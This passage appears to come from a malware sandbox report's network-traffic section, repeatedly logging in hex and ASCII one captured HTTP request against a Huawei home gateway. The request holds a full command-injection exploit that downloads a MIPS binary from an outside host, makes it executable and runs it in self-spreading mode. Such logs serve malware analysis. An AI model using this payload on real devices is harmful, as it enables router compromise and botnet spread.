65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POSTData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
